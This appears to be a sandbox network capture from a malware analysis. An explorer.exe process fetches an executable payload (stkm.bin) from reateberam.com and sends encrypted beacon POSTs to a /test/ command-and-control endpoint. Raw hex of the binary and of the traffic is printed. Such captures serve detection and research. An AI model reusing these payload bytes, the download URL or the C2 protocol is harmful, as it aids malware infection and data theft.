2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 00 00 00 4d 85 c0 0f 84 84 00 00 00 48 8b 41 18 48 39 41 10 72 22 48 03 c0 ba 0f 00 00 00 48 3b c2 48 0f 47 d0 48 81 fa c0 03 00 00 77 62 e8 78 00 00 00 83 f8 ff 74 58 49 83 c8 ff 49 ff c0 42 80 3c 06 00 75 f6 48 8b d6 48 8b cf e8 32 01 00 00 48 85 c0 75 3a 48 8b 6f 10 48 83 ca ff 48 ff c2 80 3c 16 00 75 f7 48 8b ce e8 c4 fe ff ff 48 8b 0f 48 89 04 e9 48 8b 07 48 83 3c e8 00 74 10 48 8b 47 08 4c 89 34 e8 48 ff 47 10 33 c0 eb 03 83 c8 ff 48 8b 6c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 83 39 00 48 8b f2 48 8b d9 75 1f 48 83 79 08 00 74 1f 83 c8 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 8b Data Ascii: MHAH9Ar"HH;HGHwbxtXIIB<uHH2Hu:HoHH<uHHHHH<tHGL4HG3Hl$0Ht$8H\|$@H A^H\$Hl$Ht$WH H9HHuHytH\$0Hl$8Ht$@H _HytHtHHH
2024-12-02 17:41:12 UTC	1369	IN	Data Raw: 1a 84 d2 74 23 80 fa 5c 75 0b 48 ff c0 48 89 01 80 38 00 74 13 48 ff 01 48 8b 01 8a 10 80 fa 22 75 df 48 ff c0 48 89 01 48 8b 11 80 3a 00 75 03 33 c0 c3 49 2b d0 49 8b c9 48 83 ea 02 e9 3c fd ff ff 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 83 fa 13 76 07 33 c0 e9 6c 01 00 00 48 8b 01 0f be 08 e8 4b 8e 08 00 33 db eb 0e 48 ff 07 48 8b 07 0f be 08 e8 39 8e 08 00 85 c0 75 ee 48 8b 17 80 3a 22 0f 84 06 01 00 00 80 3a 2d 0f 84 f3 00 00 00 80 3a 2f 7e be 80 3a 39 0f 8e e5 00 00 00 80 3a 5b 0f 84 ce 00 00 00 80 3a 66 74 5a 80 3a 6e 74 1b 80 3a 74 74 50 80 3a 7b 75 98 48 8d 56 01 48 8b cf e8 11 01 00 00 e9 fa 00 00 00 41 b8 04 00 00 00 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 c0 Data Ascii: t#\uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>UH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49904	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:17 UTC	151	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Connection: Keep-Alive
2024-12-02 17:41:17 UTC	940	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:17 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: MISS Last-Modified: Mon, 02 Dec 2024 17:41:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8z%2F%2Ff7SuCtHFk6XfnRa4hQ1sMkYZnJZRPji1Fr%2BwylZwLWjTCbvJOUswZ2997Ch2TirO%2B9FsQglZdZqwZ6Kf9lM7A%2FsSKg9k55hyBVdSW0xPp902Ep27oeeTr4dSXDnfYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b5e8d2e36bd-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13787&min_rtt=13784&rtt_var=5175&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=765&delivery_rate=211471&cwnd=32&unsent_bytes=0&cid=e49e5c63c170aa4a&ts=2442&x=0"
2024-12-02 17:41:17 UTC	429	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-12-02 17:41:17 UTC	1369	IN	Data Raw: 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: [p8Ph.text00 `bss@@.rdataPP@@.data``

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49914	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:20 UTC	127	OUT	GET /files/stkm.bin HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com
2024-12-02 17:41:21 UTC	948	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:21 GMT Content-Type: application/octet-stream Content-Length: 857600 Connection: close Content-Disposition: attachment; filename = stkm.bin Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 9 Last-Modified: Mon, 02 Dec 2024 17:41:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wotniigH9jNc9gM4zrGxs2p3COEl2HKwi7xI3ycLRGxRXN%2B%2BPy3PFwKVCLx4F2inS8YBim4niJlr%2FhGO4K6P%2FVAHukRZWQKyHMQtTlsBlFpZ4eo%2F26PqpDCk7lAI9Da%2BMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b767ef00fa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1487&min_rtt=1479&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=765&delivery_rate=1891191&cwnd=252&unsent_bytes=0&cid=f9f49afd07175ced&ts=1941&x=0"
2024-12-02 17:41:21 UTC	421	IN	Data Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6 Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 01 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 24 20 74 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 Data Ascii: $ tf9LT uHL$ 3H8H\$H\|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 56 41 57 48 8d a8 48 fe ff ff 48 81 ec 90 02 00 00 48 8d 05 5f 45 0c 00 c7 44 24 20 3b 64 d2 03 48 89 44 24 28 48 8d 74 24 28 48 8d 05 4e 45 0c 00 c7 44 24 30 7f 27 64 e7 45 33 e4 48 89 44 24 38 45 8b f4 4c 8d 2d f4 bf 0a 00 e8 23 fa ff ff e8 1e fa ff ff 48 89 85 c0 01 00 00 48 85 c0 0f 84 e5 00 00 00 41 8b fc ff c7 66 45 39 64 7d 00 75 f6 41 8b dc 66 44 39 20 74 09 ff c3 66 44 39 24 58 75 f7 8d 14 3b 8d 14 55 02 00 00 00 48 8d 8d c0 01 00 00 e8 1d 0d 00 00 85 c0 0f 84 a8 00 00 00 4c 8b bd c0 01 00 00 8b c3 49 8d 0c 47 03 ff 74 17 49 8b d5 44 8b c7 48 2b d1 8a 04 0a 88 01 48 ff c1 49 83 e8 01 75 f2 33 d2 48 8d 4c 24 40 41 b8 50 02 00 00 49 8b dc e8 c8 59 08 00 48 8d 54 24 40 49 8b cf ff 15 4a 44 0c 00 48 8b f8 48 83 f8 ff 74 4a eb 26 41 8b d4 66 44 39 64 Data Ascii: VAWHHHH_ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&AfD9d
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: c7 85 d8 01 00 00 1b c3 53 2b 48 89 95 e0 01 00 00 c7 85 f0 01 00 00 f2 cb 55 df 48 89 95 f8 01 00 00 c7 85 08 02 00 00 4a 47 2d d5 48 89 95 10 02 00 00 c7 85 20 02 00 00 57 12 a2 8a 48 89 95 28 02 00 00 c7 85 38 02 00 00 39 1e f1 72 48 89 95 40 02 00 00 c7 85 50 02 00 00 21 d0 52 45 48 89 95 58 02 00 00 c7 85 68 02 00 00 7a 8e 25 e9 48 89 95 70 02 00 00 c7 85 80 02 00 00 a4 1a 86 d0 48 89 95 88 02 00 00 c7 85 98 02 00 00 14 31 8b 23 48 89 95 a0 02 00 00 c7 85 b0 02 00 00 07 77 19 f5 48 89 95 b8 02 00 00 c7 85 c8 02 00 00 4d 11 46 05 48 89 95 d0 02 00 00 c7 85 e0 02 00 00 02 91 78 2d 48 8d 05 d2 3d 0c 00 48 89 95 e8 02 00 00 48 89 85 f0 02 00 00 48 8d 0d 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c Data Ascii: S+HUHJG-H WH(89rH@P!REHXhz%HpH1#HwHMFHx-H=HHH-?H='HH=
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 06 00 00 61 bc 1d 14 48 89 95 48 06 00 00 c7 85 58 06 00 00 cb a6 9c f4 48 89 95 60 06 00 00 c7 85 70 06 00 00 fd 53 ca 1c 48 89 95 78 06 00 00 c7 85 88 06 00 00 8d bf 40 ab 48 89 95 90 06 00 00 c7 85 a0 06 00 00 02 91 d8 59 48 89 95 a8 06 00 00 48 8d 05 1c 3a 0c 00 c7 85 b8 06 00 00 ce d5 eb c9 48 89 85 b0 06 00 00 48 8d 5c 24 28 48 8d 05 07 3a 0c 00 48 89 95 c0 06 00 00 48 89 85 c8 06 00 00 33 ff 48 8d 05 f8 39 0c 00 c7 85 d0 06 00 00 9f 60 3f 3d 48 89 85 e0 06 00 00 48 8d 05 e8 39 0c 00 48 89 85 f8 06 00 00 48 8d 05 ea 39 0c 00 48 89 85 10 07 00 00 48 8d 05 d4 39 0c 00 48 89 85 28 07 00 00 48 89 95 d8 06 00 00 c7 85 e8 06 00 00 9a f6 2b d8 48 89 95 f0 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 Data Ascii: aHHXH`pSHx@HYHH:HH\$(H:HH3H9`?=HH9HH9HH9H(H+HH)'uHH
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: 8d 00 00 00 4d 85 c0 0f 84 84 00 00 00 48 8b 41 18 48 39 41 10 72 22 48 03 c0 ba 0f 00 00 00 48 3b c2 48 0f 47 d0 48 81 fa c0 03 00 00 77 62 e8 78 00 00 00 83 f8 ff 74 58 49 83 c8 ff 49 ff c0 42 80 3c 06 00 75 f6 48 8b d6 48 8b cf e8 32 01 00 00 48 85 c0 75 3a 48 8b 6f 10 48 83 ca ff 48 ff c2 80 3c 16 00 75 f7 48 8b ce e8 c4 fe ff ff 48 8b 0f 48 89 04 e9 48 8b 07 48 83 3c e8 00 74 10 48 8b 47 08 4c 89 34 e8 48 ff 47 10 33 c0 eb 03 83 c8 ff 48 8b 6c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 83 39 00 48 8b f2 48 8b d9 75 1f 48 83 79 08 00 74 1f 83 c8 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 Data Ascii: MHAH9Ar"HH;HGHwbxtXIIB<uHH2Hu:HoHH<uHHHHH<tHGL4HG3Hl$0Ht$8H\|$@H A^H\$Hl$Ht$WH H9HHuHytH\$0Hl$8Ht$@H _HytHtHHH
2024-12-02 17:41:21 UTC	1369	IN	Data Raw: eb 1a 84 d2 74 23 80 fa 5c 75 0b 48 ff c0 48 89 01 80 38 00 74 13 48 ff 01 48 8b 01 8a 10 80 fa 22 75 df 48 ff c0 48 89 01 48 8b 11 80 3a 00 75 03 33 c0 c3 49 2b d0 49 8b c9 48 83 ea 02 e9 3c fd ff ff 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 83 fa 13 76 07 33 c0 e9 6c 01 00 00 48 8b 01 0f be 08 e8 4b 8e 08 00 33 db eb 0e 48 ff 07 48 8b 07 0f be 08 e8 39 8e 08 00 85 c0 75 ee 48 8b 17 80 3a 22 0f 84 06 01 00 00 80 3a 2d 0f 84 f3 00 00 00 80 3a 2f 7e be 80 3a 39 0f 8e e5 00 00 00 80 3a 5b 0f 84 ce 00 00 00 80 3a 66 74 5a 80 3a 6e 74 1b 80 3a 74 74 50 80 3a 7b 75 98 48 8d 56 01 48 8b cf e8 11 01 00 00 e9 fa 00 00 00 41 b8 04 00 00 00 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 Data Ascii: t#\uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>UH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49929	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:25 UTC	417	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hidViRxTPtzXdZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 360 Cache-Control: no-cache
2024-12-02 17:41:25 UTC	360	OUT	Data Raw: 4c 47 37 5a 48 5a 37 76 6a 4b 64 72 4e 6c 57 69 33 44 4b 48 6b 7a 55 6c 53 54 50 52 66 58 71 73 4e 36 33 72 7a 32 2b 7a 42 6c 54 6f 34 52 4f 44 30 52 61 6b 6e 4c 32 57 36 30 70 72 57 52 31 66 66 75 71 2f 67 79 42 52 56 76 48 6d 32 4b 4a 77 35 63 44 59 30 6f 4a 74 70 46 68 53 65 32 4a 4d 35 72 66 42 63 56 52 70 53 32 63 53 5a 51 72 49 75 5a 50 4f 4d 54 75 6b 36 43 77 61 4e 36 6c 59 7a 4c 67 6b 2f 56 4f 44 77 36 71 44 61 78 77 62 76 7a 4f 37 57 58 53 71 65 38 68 4f 64 37 53 67 65 48 5a 32 44 75 6d 71 48 48 68 71 6a 75 38 34 70 43 75 48 53 45 73 75 36 30 6c 44 51 67 56 4c 5a 39 36 44 4a 70 76 4c 5a 6a 32 47 4b 7a 50 67 55 6c 54 2b 51 30 45 78 4f 6a 4c 6f 35 6a 45 6a 5a 5a 49 65 6c 73 69 76 77 6f 70 4b 48 70 44 54 76 5a 33 68 59 36 73 71 48 4e 66 78 4c 58 47 Data Ascii: LG7ZHZ7vjKdrNlWi3DKHkzUlSTPRfXqsN63rz2+zBlTo4ROD0RaknL2W60prWR1ffuq/gyBRVvHm2KJw5cDY0oJtpFhSe2JM5rfBcVRpS2cSZQrIuZPOMTuk6CwaN6lYzLgk/VODw6qDaxwbvzO7WXSqe8hOd7SgeHZ2DumqHHhqju84pCuHSEsu60lDQgVLZ96DJpvLZj2GKzPgUlT+Q0ExOjLo5jEjZZIelsivwopKHpDTvZ3hY6sqHNfxLXG
2024-12-02 17:41:26 UTC	802	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwUGzj%2FAcs1Tt6WrfEUY5QhUCsybOeY4y73DXSfBqNvRWa%2B6Zqu%2FiJ4401at%2FhtbRoz%2FxZJxkDwYxaYPnqvsgI0X0Pb7taxN8iYm6a91QB6vZ%2BvEy5eL%2BRRi2HfN%2BUTL%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1b971e3443ca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1625&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1437&delivery_rate=1781574&cwnd=223&unsent_bytes=0&cid=3fafaad545dc76ac&ts=741&x=0"
2024-12-02 17:41:26 UTC	142	IN	Data Raw: 38 38 0d 0a 4f 43 57 5a 52 38 43 31 32 34 70 67 61 68 7a 64 68 57 37 6d 67 33 39 47 4f 45 4c 51 42 79 50 43 61 76 6d 37 75 43 4c 4c 62 47 6d 63 70 6d 50 2f 30 6d 7a 58 36 2f 36 47 75 44 4a 75 49 45 45 72 63 39 2f 6d 69 31 34 6d 44 37 65 39 33 71 55 4a 73 70 53 6f 6f 34 51 44 31 79 4a 63 46 47 56 4a 37 73 72 50 4d 31 51 58 48 67 31 4f 42 45 57 39 34 63 44 4c 53 57 48 53 32 32 31 4b 5a 4d 6c 65 73 2b 77 68 75 69 6b 3d 0d 0a Data Ascii: 88OCWZR8C124pgahzdhW7mg39GOELQByPCavm7uCLLbGmcpmP/0mzX6/6GuDJuIEErc9/mi14mD7e93qUJspSoo4QD1yJcFGVJ7srPM1QXHg1OBEW94cDLSWHS221KZMles+whuik=
2024-12-02 17:41:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49934	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:28 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hjdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:28 UTC	793	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5UafPnC7wNBjzSCc%2BdDKv3MeJbY7x7%2FBc%2Bv2F3iNhNILCp1AQ7rzXo9YfA37tBqp3VZNxejnSe0qEOcOwC7cpAeJIlxKQKcYgesMAqd029o%2B5ZvYiSmHXOkzoTBQJOFbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1ba419d14bd3-BUF alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28622&min_rtt=27787&rtt_var=12091&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1049&delivery_rate=84711&cwnd=32&unsent_bytes=0&cid=4c229d4ab97ac1e2&ts=802&x=0"
2024-12-02 17:41:28 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4f 43 75 65 52 73 47 31 33 59 70 6c 61 78 6a 65 68 6d 37 6f 67 33 4e 4d 4f 30 50 53 41 53 44 43 5a 2f 32 77 75 53 58 4e 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6f 49 30 63 73 65 5a 66 6c 37 46 73 6e 41 62 71 35 73 4b 68 47 73 70 47 73 70 73 30 34 37 6b 35 58 47 32 5a 4c 35 38 57 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 33 41 75 2f 6d 49 78 68 2b 61 62 4c 44 66 48 45 6c 34 4d 74 45 37 56 66 66 43 68 74 43 37 45 30 35 4e 56 4d 4d 4f 34 2f 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 56 52 70 Data Ascii: 